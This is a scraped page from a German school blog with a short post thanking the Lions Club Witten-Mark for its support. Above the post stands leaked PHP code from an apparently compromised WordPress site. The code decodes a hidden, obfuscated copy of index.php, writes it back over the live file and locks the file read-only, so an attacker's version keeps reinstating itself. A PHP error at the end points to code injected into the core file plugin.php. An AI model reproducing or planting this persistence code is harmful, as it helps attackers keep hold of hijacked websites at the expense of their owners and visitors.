$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Crengeldänzer sagen Danke! | Crengeldänzer sagen Danke!
Single post

Crengeldänzer sagen Danke!

In nicht ganz alltäglicher Form bedankten  sich die Schülerinnnen  und Schüler unserer Schule beim Lions Club Witten-Mark für die Unterstützung und die Zuwendungen der letzten Zeit. Gemeinsam formierten sie sich auf dem Schulhof, um ihr großes Dankeschön auch optisch darzustellen:

Wir freuen uns alle auf die weitere Zusammenarbeit und großzügige Hilfe durch den Lions Club!

theme by teslathemes

Warning: file_get_contents(index.php): failed to open stream: No such file or directory in /usr/www/users/crengel/wp-includes/plugin.php on line 437